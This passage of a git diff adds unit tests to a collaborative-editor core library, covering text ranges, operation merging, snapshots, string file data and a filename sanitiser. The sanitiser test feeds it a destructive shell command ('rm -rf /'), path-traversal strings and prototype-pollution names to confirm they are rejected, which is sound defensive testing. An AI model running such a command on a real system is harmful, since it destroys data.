expect(from1to5.startsAfter(from5to9)).to.eql(false) + expect(from1to5.startsAfter(from6to10)).to.eql(false) + expect(from1to5.startsAfter(from10to14)).to.eql(false) + + expect(from5to9.startsAfter(from0to4)).to.eql(true) + expect(from5to9.startsAfter(from1to5)).to.eql(false) + expect(from5to9.startsAfter(from5to9)).to.eql(false) + expect(from5to9.startsAfter(from6to10)).to.eql(false) + expect(from5to9.startsAfter(from10to14)).to.eql(false) + + expect(from6to10.startsAfter(from0to4)).to.eql(true) + expect(from6to10.startsAfter(from1to5)).to.eql(true) + expect(from6to10.startsAfter(from5to9)).to.eql(false) + expect(from6to10.startsAfter(from6to10)).to.eql(false) + expect(from6to10.startsAfter(from10to14)).to.eql(false) + + expect(from10to14.startsAfter(from0to4)).to.eql(true) + expect(from10to14.startsAfter(from1to5)).to.eql(true) + expect(from10to14.startsAfter(from5to9)).to.eql(true) + expect(from10to14.startsAfter(from6to10)).to.eql(false) + expect(from10to14.startsAfter(from10to14)).to.eql(false) + }) + + it('should check if range starts after a position', function () { + const from5to14 = new Range(5, 10) + expect(from5to14.startIsAfter(3)).to.be.true + expect(from5to14.startIsAfter(4)).to.be.true + expect(from5to14.startIsAfter(5)).to.be.false + expect(from5to14.startIsAfter(6)).to.be.false + expect(from5to14.startIsAfter(15)).to.be.false + expect(from5to14.startIsAfter(16)).to.be.false + }) + + it('should extend the range', function () { + const from5to14 = new Range(5, 10) + const result = from5to14.extendBy(3) + expect(result.length).to.eql(13) + expect(result.start).to.eql(5) + expect(result.end).to.eql(18) + }) + + it('should shrink the range', function () { + const from5to14 = new Range(5, 10) + const result = from5to14.shrinkBy(3) + expect(result.length).to.eql(7) + expect(result.start).to.eql(5) + expect(result.end).to.eql(12) + }) + + it('should throw if shrinking too much', function () { + const from5to14 = new Range(5, 10) + expect(() => from5to14.shrinkBy(11)).to.throw() + }) + + it('should move the range', function () { + const from5to14 = new Range(5, 10) + const result = from5to14.moveBy(3) + expect(result.length).to.eql(10) + expect(result.start).to.eql(8) + expect(result.end).to.eql(18) + }) + + describe('splitAt', function () { + it('should split at the start', function () { + const range = new Range(5, 10) + const [left, right] = range.splitAt(5) + expect(left.isEmpty()).to.be.true + expect(right.start).to.eql(5) + expect(right.end).to.eql(15) + }) + + it('should not split before the start', function () { + const range = new Range(5, 10) + expect(() => range.splitAt(4)).to.throw() + }) + + it('should split at last cursor in range', function () { + const range = new Range(5, 10) + const [left, right] = range.splitAt(14) + expect(left.start).to.equal(5) + expect(left.end).to.equal(14) + expect(right.start).to.equal(14) + expect(right.end).to.equal(15) + }) + + it('should not split after the end', function () { + const range = new Range(5, 10) + expect(() => range.splitAt(16)).to.throw() + }) + + it('should split at end', function () { + const range = new Range(5, 10) + const [left, right] = range.splitAt(15) + expect(left.start).to.equal(5) + expect(left.end).to.equal(15) + expect(right.start).to.equal(15) + expect(right.end).to.equal(15) + }) + + it('should split in the middle', function () { + const range = new Range(5, 10) + const [left, right] = range.splitAt(10) + expect(left.start).to.equal(5) + expect(left.end).to.equal(10) + expect(right.start).to.equal(10) + expect(right.end).to.equal(15) + }) + }) + + describe('insertAt', function () { + it('should insert at the start', function () { + const range = new Range(5, 10) + const [left, inserted, right] = range.insertAt(5, 3) + expect(left.isEmpty()).to.be.true + expect(inserted.start).to.eql(5) + expect(inserted.end).to.eql(8) + expect(right.start).to.eql(8) + expect(right.end).to.eql(18) + }) + + it('should insert at the end', function () { + const range = new Range(5, 10) + const [left, inserted, right] = range.insertAt(15, 3) + expect(left.start).to.eql(5) + expect(left.end).to.eql(15) + expect(inserted.start).to.eql(15) + expect(inserted.end).to.eql(18) + expect(right.isEmpty()).to.be.true + }) + + it('should insert in the middle', function () { + const range = new Range(5, 10) + const [left, inserted, right] = range.insertAt(10, 3) + expect(left.start).to.eql(5) + expect(left.end).to.eql(10) + expect(inserted.start).to.eql(10) + expect(inserted.end).to.eql(13) + expect(right.start).to.eql(13) + expect(right.end).to.eql(18) + }) + + it('should throw if cursor is out of range', function () { + const range = new Range(5, 10) + expect(() => range.insertAt(4, 3)).to.throw() + expect(() => range.insertAt(16, 3)).to.throw() + }) + }) +}) diff --git a/libraries/overleaf-editor-core/test/safe_pathname.test.js b/libraries/overleaf-editor-core/test/safe_pathname.test.js new file mode 100644 index 0000000..bfde298 --- /dev/null +++ b/libraries/overleaf-editor-core/test/safe_pathname.test.js @@ -0,0 +1,126 @@ +'use strict' + +const { expect } = require('chai') +const ot = require('..') +const safePathname = ot.safePathname + +describe('safePathname', function () { + function expectClean(input, output, reason = '') { + // check expected output and also idempotency + const [cleanedInput, gotReason] = safePathname.cleanDebug(input) + expect(cleanedInput).to.equal(output) + expect(gotReason).to.equal(reason) + expect(safePathname.clean(cleanedInput)).to.equal(cleanedInput) + expect(safePathname.isClean(cleanedInput)).to.be.true + } + + it('cleans pathnames', function () { + // preserve valid pathnames + expectClean('llama.jpg', 'llama.jpg') + expectClean('DSC4056.JPG', 'DSC4056.JPG') + + // detects unclean pathnames + expect(safePathname.isClean('rm -rf /')).to.be.falsy + + // replace invalid characters with underscores + expectClean( + 'test-s*\u0001\u0002m\u0007st\u0008.jpg', + 'test-s___m_st_.jpg', + 'cleanPart' + ) + + // keep slashes, normalize paths, replace .. + expectClean('./foo', 'foo', 'normalize') + expectClean('../foo', '__/foo', 'cleanPart') + expectClean('foo/./bar', 'foo/bar', 'normalize') + expectClean('foo/../bar', 'bar', 'normalize') + expectClean('../../tricky/foo.bar', '__/__/tricky/foo.bar', 'cleanPart') + expectClean( + 'foo/../../tricky/foo.bar', + '__/tricky/foo.bar', + 'normalize,cleanPart' + ) + expectClean('foo/bar/../../tricky/foo.bar', 'tricky/foo.bar', 'normalize') + expectClean( + 'foo/bar/baz/../../tricky/foo.bar', + 'foo/tricky/foo.bar', + 'normalize' + ) + + // remove illegal chars even when there is no extension + expectClean('**foo', '__foo', 'cleanPart') + + // remove windows file paths + expectClean('c:\\temp\\foo.txt', 'c:/temp/foo.txt', 'workaround for IE') + + // do not allow a leading slash (relative paths only) + expectClean('/foo', '_/foo', 'no leading /') + expectClean('//foo', '_/foo', 'normalize,no leading /') + + // do not allow multiple leading slashes + expectClean('//foo', '_/foo', 'normalize,no leading /') + + // do not allow a trailing slash + expectClean('/', '_', 'no leading /,no trailing /') + expectClean('foo/', 'foo', 'no trailing /') + expectClean('foo.tex/', 'foo.tex', 'no trailing /') + + // do not allow multiple trailing slashes + expectClean('//', '_', 'normalize,no leading /,no trailing /') + expectClean('///', '_', 'normalize,no leading /,no trailing /') + expectClean('foo//', 'foo', 'normalize,no trailing /') + + // file and folder names that consist of . and .. are not OK + expectClean('.', '_', 'cleanPart') + expectClean('..', '__', 'cleanPart') + // we will allow name with more dots e.g. ... and .... + expectClean('...', '...') + expectClean('....', '....') + expectClean('foo/...', 'foo/...') + expectClean('foo/....', 'foo/....') + expectClean('foo/.../bar', 'foo/.../bar') + expectClean('foo/..../bar', 'foo/..../bar') + + // leading dots are OK + expectClean('._', '._') + expectClean('.gitignore', '.gitignore') + + // trailing dots are not OK on Windows but we allow them + expectClean('_.', '_.') + expectClean('foo/_.', 'foo/_.') + expectClean('foo/_./bar', 'foo/_./bar') + expectClean('foo/_../bar', 'foo/_../bar') + + // spaces are allowed + expectClean('a b.png', 'a b.png') + + // leading and trailing spaces are not OK + expectClean(' foo', 'foo', 'no leading spaces') + expectClean(' foo', 'foo', 'no leading spaces') + expectClean('foo ', 'foo', 'no trailing spaces') + expectClean('foo ', 'foo', 'no trailing spaces') + + // reserved file names on Windows should not be OK, but we already have + // some in the old system, so have to allow them for now + expectClean('AUX', 'AUX') + expectClean('foo/AUX', 'foo/AUX') + expectClean('AUX/foo', 'AUX/foo') + + // multiple dots are OK + expectClean('a.b.png', 'a.b.png') + expectClean('a.code.tex', 'a.code.tex') + + // there's no particular reason to allow multiple slashes; sometimes people + // seem to rename files to URLs (https://domain/path) in an attempt to + // upload a file, and this results in an empty directory name + expectClean('foo//bar.png', 'foo/bar.png', 'normalize') + expectClean('foo///bar.png', 'foo/bar.png', 'normalize') + + // Check javascript property handling + expectClean('foo/prototype', 'foo/prototype') // OK as part of a pathname + expectClean('prototype/test.txt', 'prototype/test.txt') + expectClean('prototype', '@prototype', 'BLOCKED_FILE_RX') // not OK as whole pathname + expectClean('hasOwnProperty', '@hasOwnProperty', 'BLOCKED_FILE_RX') + expectClean('**proto**', '@__proto__', 'cleanPart,BLOCKED_FILE_RX') + }) +}) diff --git a/libraries/overleaf-editor-core/test/scan_op.test.js b/libraries/overleaf-editor-core/test/scan_op.test.js new file mode 100644 index 0000000..80ab691 --- /dev/null +++ b/libraries/overleaf-editor-core/test/scan_op.test.js @@ -0,0 +1,477 @@ +// @ts-check +const { expect } = require('chai') +const { + RetainOp, + ScanOp, + InsertOp, + RemoveOp, +} = require('../lib/operation/scan_op') +const { UnprocessableError, ApplyError } = require('../lib/errors') +const TrackingProps = require('../lib/file_data/tracking_props') + +describe('ScanOp', function () { + describe('fromJSON', function () { + it('constructs a RetainOp from object', function () { + const op = ScanOp.fromJSON({ r: 1 }) + expect(op).to.be.instanceOf(RetainOp) + expect(/** @type {RetainOp} */ (op).length).to.equal(1) + }) + + it('constructs a RetainOp from number', function () { + const op = ScanOp.fromJSON(2) + expect(op).to.be.instanceOf(RetainOp) + expect(/** @type {RetainOp} */ (op).length).to.equal(2) + }) + + it('constructs an InsertOp from string', function () { + const op = ScanOp.fromJSON('abc') + expect(op).to.be.instanceOf(InsertOp) + expect(/** @type {InsertOp} */ (op).insertion).to.equal('abc') + }) + + it('constructs an InsertOp from object', function () { + const op = ScanOp.fromJSON({ i: 'abc' }) + expect(op).to.be.instanceOf(InsertOp) + expect(/** @type {InsertOp} */ (op).insertion).to.equal('abc') + }) + + it('constructs a RemoveOp from number', function () { + const op = ScanOp.fromJSON(-2) + expect(op).to.be.instanceOf(RemoveOp) + expect(/** @type {RemoveOp} */ (op).length).to.equal(2) + }) + + it('throws an error for invalid input', function () { + expect(() => ScanOp.fromJSON(/** @type {any} */ ({}))).to.throw( + UnprocessableError + ) + }) + + it('throws an error for zero', function () { + expect(() => ScanOp.fromJSON(0)).to.throw(UnprocessableError) + }) + }) +}) + +describe('RetainOp', function () { + it('is equal to another RetainOp with the same length', function () { + const op1 = new RetainOp(1) + const op2 = new RetainOp(1) + expect(op1.equals(op2)).to.be.true + }) + + it('is not equal to another RetainOp with a different length', function () { + const op1 = new RetainOp(1) + const op2 = new RetainOp(2) + expect(op1.equals(op2)).to.be.false + }) + + it('is not equal to another RetainOp with no tracking info', function () { + const op1 = new RetainOp( + 4, + new TrackingProps('insert', 'user1', new Date('2024-01-01T00:00:00.000Z')) + ) + const op2 = new RetainOp(4) + expect(op1.equals(op2)).to.be.false + }) + + it('is not equal to another RetainOp with different tracking info', function () { + const op1 = new RetainOp( + 4, + new TrackingProps('insert', 'user1', new Date('2024-01-01T00:00:00.000Z')) + ) + const op2 = new RetainOp( + 4, + new TrackingProps('insert', 'user2', new Date('2024-01-01T00:00:00.000Z')) + ) + expect(op1.equals(op2)).to.be.false + }) + + it('is not equal to an InsertOp', function () { + const op1 = new RetainOp(1) + const op2 = new InsertOp('a') + expect(op1.equals(op2)).to.be.false + }) + + it('is not equal to a RemoveOp', function () { + const op1 = new RetainOp(1) + const op2 = new RemoveOp(1) + expect(op1.equals(op2)).to.be.false + }) + + it('can merge with another RetainOp', function () { + const op1 = new RetainOp(1) + const op2 = new RetainOp(2) + expect(op1.canMergeWith(op2)).to.be.true + op1.mergeWith(op2) + expect(op1.equals(new RetainOp(3))).to.be.true + }) + + it('cannot merge with another RetainOp if tracking info is different', function () { + const op1 = new RetainOp( + 4, + new TrackingProps('insert', 'user1', new Date('2024-01-01T00:00:00.000Z')) + ) + const op2 = new RetainOp( + 4, + new TrackingProps('insert', 'user2', new Date('2024-01-01T00:00:00.000Z')) + ) + expect(op1.canMergeWith(op2)).to.be.false + expect(() => op1.mergeWith(op2)).to.throw(Error) + }) + + it('can merge with another RetainOp if tracking info is the same', function () { + const op1 = new RetainOp( + 4, + new TrackingProps('insert', 'user1', new Date('2024-01-01T00:00:00.000Z')) + ) + const op2 = new RetainOp( + 4, + new TrackingProps('insert', 'user1', new Date('2024-01-01T00:00:00.000Z')) + ) + op1.mergeWith(op2) + expect( + op1.equals( + new RetainOp( + 8, + new TrackingProps( + 'insert', + 'user1', + new Date('2024-01-01T00:00:00.000Z') + ) + ) + ) + ).to.be.true + }) + + it('cannot merge with an InsertOp', function () { + const op1 = new RetainOp(1) + const op2 = new InsertOp('a') + expect(op1.canMergeWith(op2)).to.be.false + expect(() => op1.mergeWith(op2)).to.throw(Error) + }) + + it('cannot merge with a RemoveOp', function () { + const op1 = new RetainOp(1) + const op2 = new RemoveOp(1) + expect(op1.canMergeWith(op2)).to.be.false + expect(() => op1.mergeWith(op2)).to.throw(Error) + }) + + it('can be converted to JSON', function () { + const op = new RetainOp(3) + expect(op.toJSON()).to.equal(3) + }) + + it('adds to the length and cursor when applied to length', function () { + const op = new RetainOp(3) + const { length, inputCursor } = op.applyToLength({ + length: 10, + inputCursor: 10, + inputLength: 30, + }) + expect(length).to.equal(13) + expect(inputCursor).to.equal(13) + }) +}) + +describe('InsertOp', function () { + it('is equal to another InsertOp with the same insertion', function () { + const op1 = new InsertOp('a') + const op2 = new InsertOp('a') + expect(op1.equals(op2)).to.be.true + }) + + it('is not equal to another InsertOp with a different insertion', function () { + const op1 = new InsertOp('a') + const op2 = new InsertOp('b') + expect(op1.equals(op2)).to.be.false + }) + + it('is not equal to another InsertOp with no tracking info', function () { + const op1 = new InsertOp( + 'a', + new TrackingProps('insert', 'user1', new Date('2024-01-01T00:00:00.000Z')) + ) + const op2 = new InsertOp('a') + expect(op1.equals(op2)).to.be.false + }) + + it('is not equal to another InsertOp with different tracking info', function () { + const op1 = new InsertOp( + 'a', + new TrackingProps('insert', 'user1', new Date('2024-01-01T00:00:00.000Z')) + ) + const op2 = new InsertOp( + 'a', + new TrackingProps('insert', 'user2', new Date('2024-01-01T00:00:00.000Z')) + ) + expect(op1.equals(op2)).to.be.false + }) + + it('is not equal to another InsertOp with no comment ids', function () { + const op1 = new InsertOp('a', undefined, ['1']) + const op2 = new InsertOp('a') + expect(op1.equals(op2)).to.be.false + }) + + it('is not equal to another InsertOp with tracking info', function () { + const op1 = new InsertOp('a', undefined) + const op2 = new InsertOp( + 'a', + new TrackingProps('insert', 'user1', new Date('2024-01-01T00:00:00.000Z')) + ) + expect(op1.equals(op2)).to.be.false + }) + + it('is not equal to another InsertOp with comment ids', function () { + const op1 = new InsertOp('a') + const op2 = new InsertOp('a', undefined, ['1']) + expect(op1.equals(op2)).to.be.false + }) + + it('is not equal to another InsertOp with different comment ids', function () { + const op1 = new InsertOp('a', undefined, ['1']) + const op2 = new InsertOp('a', undefined, ['2']) + expect(op1.equals(op2)).to.be.false + }) + + it('is not equal to another InsertOp with overlapping comment ids', function () { + const op1 = new InsertOp('a', undefined, ['1']) + const op2 = new InsertOp('a', undefined, ['2', '1']) + expect(op1.equals(op2)).to.be.false + }) + + it('is not equal to a RetainOp', function () { + const op1 = new InsertOp('a') + const op2 = new RetainOp(1) + expect(op1.equals(op2)).to.be.false + }) + + it('is not equal to a RemoveOp', function () { + const op1 = new InsertOp('a') + const op2 = new RemoveOp(1) + expect(op1.equals(op2)).to.be.false + }) + + it('can merge with another InsertOp', function () { + const op1 = new InsertOp('a') + const op2 = new InsertOp('b') + expect(op1.canMergeWith(op2)).to.be.true + op1.mergeWith(op2) + expect(op1.equals(new InsertOp('ab'))).to.be.true + }) + + it('cannot merge with another InsertOp if comment id info is different', function () { + const op1 = new InsertOp('a', undefined, ['1']) + const op2 = new InsertOp('b', undefined, ['1', '2']) + expect(op1.canMergeWith(op2)).to.be.false + expect(() => op1.mergeWith(op2)).to.throw(Error) + }) + + it('cannot merge with another InsertOp if comment id info is different while tracking info matches', function () { + const op1 = new InsertOp( + 'a', + new TrackingProps( + 'insert', + 'user1', + new Date('2024-01-01T00:00:00.000Z') + ), + ['1', '2'] + ) + const op2 = new InsertOp( + 'b', + new TrackingProps( + 'insert', + 'user1', + new Date('2024-01-01T00:00:00.000Z') + ), + ['3'] + ) + expect(op1.canMergeWith(op2)).to.be.false + expect(() => op1.mergeWith(op2)).to.throw(Error) + }) + + it('cannot merge with another InsertOp if comment id is present in other and tracking info matches', function () { + const op1 = new InsertOp( + 'a', + new TrackingProps('insert', 'user1', new Date('2024-01-01T00:00:00.000Z')) + ) + const op2 = new InsertOp( + 'b', + new TrackingProps( + 'insert', + 'user1', + new Date('2024-01-01T00:00:00.000Z') + ), + ['1'] + ) + expect(op1.canMergeWith(op2)).to.be.false + expect(() => op1.mergeWith(op2)).to.throw(Error) + }) + + it('cannot merge with another InsertOp if tracking info is different', function () { + const op1 = new InsertOp( + 'a', + new TrackingProps('insert', 'user1', new Date('2024-01-01T00:00:00.000Z')) + ) + const op2 = new InsertOp( + 'b', + new TrackingProps('insert', 'user2', new Date('2024-01-01T00:00:00.000Z')) + ) + expect(op1.canMergeWith(op2)).to.be.false + expect(() => op1.mergeWith(op2)).to.throw(Error) + }) + + it('can merge with another InsertOp if tracking and comment info is the same', function () { + const op1 = new InsertOp( + 'a', + new TrackingProps( + 'insert', + 'user1', + new Date('2024-01-01T00:00:00.000Z') + ), + ['1', '2'] + ) + const op2 = new InsertOp( + 'b', + new TrackingProps( + 'insert', + 'user1', + new Date('2024-01-01T00:00:00.000Z') + ), + ['1', '2'] + ) + expect(op1.canMergeWith(op2)).to.be.true + op1.mergeWith(op2) + expect( + op1.equals( + new InsertOp( + 'ab', + new TrackingProps( + 'insert', + 'user1', + new Date('2024-01-01T00:00:00.000Z') + ), + ['1', '2'] + ) + ) + ).to.be.true + }) + + it('cannot merge with a RetainOp', function () { + const op1 = new InsertOp('a') + const op2 = new RetainOp(1) + expect(op1.canMergeWith(op2)).to.be.false + expect(() => op1.mergeWith(op2)).to.throw(Error) + }) + + it('cannot merge with a RemoveOp', function () { + const op1 = new InsertOp('a') + const op2 = new RemoveOp(1) + expect(op1.canMergeWith(op2)).to.be.false + expect(() => op1.mergeWith(op2)).to.throw(Error) + }) + + it('can be converted to JSON', function () { + const op = new InsertOp('a') + expect(op.toJSON()).to.equal('a') + }) + + it('adds to the length when applied to length', function () { + const op = new InsertOp('abc') + const { length, inputCursor } = op.applyToLength({ + length: 10, + inputCursor: 20, + inputLength: 40, + }) + expect(length).to.equal(13) + expect(inputCursor).to.equal(20) + }) + + it('can apply a retain of the rest of the input', function () { + const op = new RetainOp(10) + const { length, inputCursor } = op.applyToLength({ + length: 10, + inputCursor: 5, + inputLength: 15, + }) + expect(length).to.equal(20) + expect(inputCursor).to.equal(15) + }) + + it('cannot apply to length if the input cursor is at the end', function () { + const op = new RetainOp(10) + expect(() => + op.applyToLength({ + length: 10, + inputCursor: 10, + inputLength: 10, + }) + ).to.throw(ApplyError) + }) +}) + +describe('RemoveOp', function () { + it('is equal to another RemoveOp with the same length', function () { + const op1 = new RemoveOp(1) + const op2 = new RemoveOp(1) + expect(op1.equals(op2)).to.be.true + }) + + it('is not equal to another RemoveOp with a different length', function () { + const op1 = new RemoveOp(1) + const op2 = new RemoveOp(2) + expect(op1.equals(op2)).to.be.false + }) + + it('is not equal to a RetainOp', function () { + const op1 = new RemoveOp(1) + const op2 = new RetainOp(1) + expect(op1.equals(op2)).to.be.false + }) + + it('is not equal to an InsertOp', function () { + const op1 = new RemoveOp(1) + const op2 = new InsertOp('a') + expect(op1.equals(op2)).to.be.false + }) + + it('can merge with another RemoveOp', function () { + const op1 = new RemoveOp(1) + const op2 = new RemoveOp(2) + expect(op1.canMergeWith(op2)).to.be.true + op1.mergeWith(op2) + expect(op1.equals(new RemoveOp(3))).to.be.true + }) + + it('cannot merge with a RetainOp', function () { + const op1 = new RemoveOp(1) + const op2 = new RetainOp(1) + expect(op1.canMergeWith(op2)).to.be.false + expect(() => op1.mergeWith(op2)).to.throw(Error) + }) + + it('cannot merge with an InsertOp', function () { + const op1 = new RemoveOp(1) + const op2 = new InsertOp('a') + expect(op1.canMergeWith(op2)).to.be.false + expect(() => op1.mergeWith(op2)).to.throw(Error) + }) + + it('can be converted to JSON', function () { + const op = new RemoveOp(3) + expect(op.toJSON()).to.equal(-3) + }) + + it('adds to the input cursor when applied to length', function () { + const op = new RemoveOp(3) + const { length, inputCursor } = op.applyToLength({ + length: 10, + inputCursor: 10, + inputLength: 30, + }) + expect(length).to.equal(10) + expect(inputCursor).to.equal(13) + }) +}) diff --git a/libraries/overleaf-editor-core/test/snapshot.test.js b/libraries/overleaf-editor-core/test/snapshot.test.js new file mode 100644 index 0000000..f797995 --- /dev/null +++ b/libraries/overleaf-editor-core/test/snapshot.test.js @@ -0,0 +1,92 @@ +'use strict' + +const { expect } = require('chai') +const { + File, + Snapshot, + TextOperation, + Change, + EditFileOperation, +} = require('..') + +describe('Snapshot', function () { + describe('findBlobHashes', function () { + it('finds blob hashes from files', function () { + const snapshot = new Snapshot() + + const blobHashes = new Set() + snapshot.findBlobHashes(blobHashes) + expect(blobHashes.size).to.equal(0) + + // Add a file without a hash. + snapshot.addFile('foo', File.fromString('')) + snapshot.findBlobHashes(blobHashes) + expect(blobHashes.size).to.equal(0) + + // Add a file with a hash. + snapshot.addFile('bar', File.fromHash(File.EMPTY_FILE_HASH)) + snapshot.findBlobHashes(blobHashes) + expect(Array.from(blobHashes)).to.have.members([File.EMPTY_FILE_HASH]) + }) + }) + + describe('editFile', function () { + let snapshot + let operation + + beforeEach(function () { + snapshot = new Snapshot() + snapshot.addFile('hello.txt', File.fromString('hello')) + operation = new TextOperation() + operation.retain(5) + operation.insert(' world!') + }) + + it('applies text operations to the file', function () { + snapshot.editFile('hello.txt', operation) + const file = snapshot.getFile('hello.txt') + expect(file.getContent()).to.equal('hello world!') + }) + + it('rejects text operations for nonexistent file', function () { + expect(() => { + snapshot.editFile('does-not-exist.txt', operation) + }).to.throw(Snapshot.EditMissingFileError) + }) + }) + + describe('applyAll', function () { + let snapshot + let change + + beforeEach(function () { + snapshot = new Snapshot() + snapshot.addFile('empty.txt', File.fromString('')) + const badTextOp = new TextOperation() + badTextOp.insert('FAIL!') + const goodTextOp = new TextOperation() + goodTextOp.insert('SUCCESS!') + change = new Change( + [ + new EditFileOperation('missing.txt', badTextOp), + new EditFileOperation('empty.txt', goodTextOp), + ], + new Date() + ) + }) + + it('ignores recoverable errors', function () { + snapshot.applyAll([change]) + const file = snapshot.getFile('empty.txt') + expect(file.getContent()).to.equal('SUCCESS!') + }) + + it('stops on recoverable errors in strict mode', function () { + expect(() => { + snapshot.applyAll([change], { strict: true }) + }).to.throw(Snapshot.EditMissingFileError) + const file = snapshot.getFile('empty.txt') + expect(file.getContent()).to.equal('') + }) + }) +}) diff --git a/libraries/overleaf-editor-core/test/string_file_data.test.js b/libraries/overleaf-editor-core/test/string_file_data.test.js new file mode 100644 index 0000000..45a0337 --- /dev/null +++ b/libraries/overleaf-editor-core/test/string_file_data.test.js @@ -0,0 +1,167 @@ +// @ts-check +'use strict' + +const { expect } = require('chai') +const _ = require('lodash') + +const ot = require('..') +const StringFileData = require('../lib/file_data/string_file_data') +const TextOperation = ot.TextOperation + +describe('StringFileData', function () { + it('throws when it contains non BMP chars', function () { + const content = '𝌆𝌆𝌆' + const fileData = new StringFileData(content) + const operation = new TextOperation() + operation.insert('aa') + expect(() => { + fileData.edit(operation) + }).to.throw(TextOperation.ApplyError, /string contains non BMP characters/) + }) + + it('validates string length when edited', function () { + const longString = _.repeat('a', TextOperation.MAX_STRING_LENGTH) + const fileData = new StringFileData(longString) + expect(fileData.getByteLength()).to.equal(longString.length) + expect(fileData.getStringLength()).to.equal(longString.length) + + expect(() => { + fileData.edit(new TextOperation().retain(longString.length).insert('x')) + }).to.throw(TextOperation.TooLongError) + expect(fileData.getByteLength()).to.equal(longString.length) + expect(fileData.getStringLength()).to.equal(longString.length) + + fileData.edit(new TextOperation().retain(longString.length - 1).remove(1)) + expect(fileData.getByteLength()).to.equal(longString.length - 1) + expect(fileData.getStringLength()).to.equal(longString.length - 1) + }) + + it('getComments() should return an empty array', function () { + const fileData = new StringFileData('test') + expect(fileData.getComments().toRaw()).to.eql([]) + }) + + it('creates StringFileData with comments', function () { + const fileData = new StringFileData('test', [ + { + id: 'comm1', + ranges: [ + { + pos: 5, + length: 10, + }, + ], + }, + { + id: 'comm2', + ranges: [ + { + pos: 20, + length: 5, + }, + ], + }, + ]) + + expect(fileData.getComments().toRaw()).to.eql([ + { id: 'comm1', ranges: [{ pos: 5, length: 10 }] }, + { id: 'comm2', ranges: [{ pos: 20, length: 5 }] }, + ]) + }) + + it('fromRaw() should create StringFileData with comments', function () { + const fileData = StringFileData.fromRaw({ + content: 'test', + comments: [ + { + id: 'comm1', + ranges: [ + { + pos: 5, + length: 10, + }, + ], + }, + { + id: 'comm2', + ranges: [ + { + pos: 20, + length: 5, + }, + ], + resolved: true, + }, + ], + }) + + expect(fileData.getComments().toRaw()).to.eql([ + { id: 'comm1', ranges: [{ pos: 5, length: 10 }] }, + { id: 'comm2', ranges: [{ pos: 20, length: 5 }], resolved: true }, + ]) + }) + + it('getContent should filter out tracked deletions when passed option', function () { + const fileData = new StringFileData( + 'the quick brown fox jumps over the lazy dog', + undefined, + [ + { + range: { pos: 4, length: 6 }, + tracking: { + type: 'delete', + ts: '2024-01-01T00:00:00.000Z', + userId: 'user1', + }, + }, + { + range: { pos: 35, length: 5 }, + tracking: { + type: 'delete', + ts: '2023-01-01T00:00:00.000Z', + userId: 'user2', + }, + }, + ] + ) + + expect(fileData.getContent()).to.equal( + 'the quick brown fox jumps over the lazy dog' + ) + expect(fileData.getContent({ filterTrackedDeletes: true })).to.equal( + 'the brown fox jumps over the dog' + ) + }) + + it('getContent should keep tracked insertions when passed option to remove tracked changes', function () { + const fileData = new StringFileData( + 'the quick brown fox jumps over the lazy dog', + undefined, + [ + { + range: { pos: 4, length: 6 }, + tracking: { + type: 'insert', + ts: '2024-01-01T00:00:00.000Z', + userId: 'user1', + }, + }, + { + range: { pos: 35, length: 5 }, + tracking: { + type: 'delete', + ts: '2023-01-01T00:00:00.000Z', + userId: 'user2', + }, + }, + ] + ) + + expect(fileData.getContent()).to.equal( + 'the quick brown fox jumps over the lazy dog' + ) + expect(fileData.getContent({ filterTrackedDeletes: true })).to.equal( + 'the quick brown fox jumps over the dog' + ) + }) +}) diff --git a/libraries/overleaf-editor-core/test/support/fake_blob_store.js b/libraries/overleaf-editor-core/test/support/fake_blob_store.js new file mode 100644 index 0000000..2b6ad7c --- /dev/null +++ b/libraries/overleaf-editor-core/test/support/fake_blob_store.js @@ -0,0 +1,30 @@ +/** + * @import { Blob } from "../.." + */ + +/** + * Fake blob store for tests + */ +class FakeBlobStore { + /** + * Get a string from the blob store + * + * @param {string} hash + * @return {Promise} + */ + getString(hash) { + throw new Error('Not implemented') + } + + /** + * Store a string in the blob store + * + * @param {string} content + * @return {Promise} + */ + putString(content) { + throw new Error('Not implemented') + } +} + +module.exports = FakeBlobStore diff --git a/libraries/overleaf-editor-core/test/support/random.js b/libraries/overleaf-editor-core/test/support/random.js new file mode 100644 index 0000000..76fad2e --- /dev/null +++ b/libraries/overleaf-editor-core/test/support/random.js @@ -0,0 +1,66 @@ +// +// Randomised testing helpers from OT.js: +// https://github.com/Operational-Transformation/ot.js/blob/ +// 8873b7e28e83f9adbf6c3a28ec639c9151a838ae/test/helpers.js +// +'use strict' + +function randomInt(n) { + return Math.floor(Math.random() * n) +} + +function randomString(n, newLine = true) { + let str = '' + while (n--) { + if (newLine && Math.random() < 0.15) { + str += '\n' + } else { + const chr = randomInt(26) + 97 + str += String.fromCharCode(chr) + } + } + return str +} + +function randomElement(arr) { + return arr[randomInt(arr.length)] +} + +function randomTest(numTrials, test) { + return function () { + while (numTrials--) test() + } +} + +function randomSubset(arr) { + const n = randomInt(arr.length) + const subset = [] + const indices = [] + for (let i = 0; i < arr.length; i++) indices.push(i) + for (let i = 0; i < n; i++) { + const index = randomInt(indices.length) + subset.push(arr[indices[index]]) + indices.splice(index, 1) + } + return subset +} + +function randomComments(number) { + const ids = new Set() + const comments = [] + while (comments.length < number) { + const id = randomString(10, false) + if (!ids.has(id)) { + comments.push({ id, ranges: [], resolved: false }) + ids.add(id) + } + } + return { ids: Array.from(ids), comments } +} + +exports.int = randomInt +exports.string = randomString +exports.element = randomElement +exports.test = randomTest +exports.comments = randomComments +exports.subset = randomSubset diff --git a/libraries/overleaf-editor-core/test/support/random_text_operation.js b/libraries/overleaf-editor-core/test/support/random_text_operation.js new file mode 100644 index 0000000..a600cdc --- /dev/null +++ b/libraries/overleaf-editor-core/test/support/random_text_operation.js @@ -0,0 +1,57 @@ +const TrackingProps = require('../../lib/file_data/tracking_props') +const ClearTrackingProps = require('../../lib/file_data/clear_tracking_props') +const TextOperation = require('../../lib/operation/text_operation') +const random = require('./random') + +/** + * + * @param {string} str + * @param {string[]} [commentIds] + * @returns {TextOperation} + */ +function randomTextOperation(str, commentIds) { + const operation = new TextOperation() + let left + while (true) { + left = str.length - operation.baseLength + if (left === 0) break + const r = Math.random() + const l = 1 + random.int(Math.min(left - 1, 20)) + const trackedChange = + Math.random() < 0.1 + ? new TrackingProps( + random.element(['insert', 'delete']), + random.element(['user1', 'user2', 'user3']), + new Date( + random.element([ + '2024-01-01T00:00:00.000Z', + '2023-01-01T00:00:00.000Z', + '2022-01-01T00:00:00.000Z', + ]) + ) + ) + : undefined + if (r < 0.2) { + let operationCommentIds + if (commentIds?.length > 0 && Math.random() < 0.3) { + operationCommentIds = random.subset(commentIds) + } + 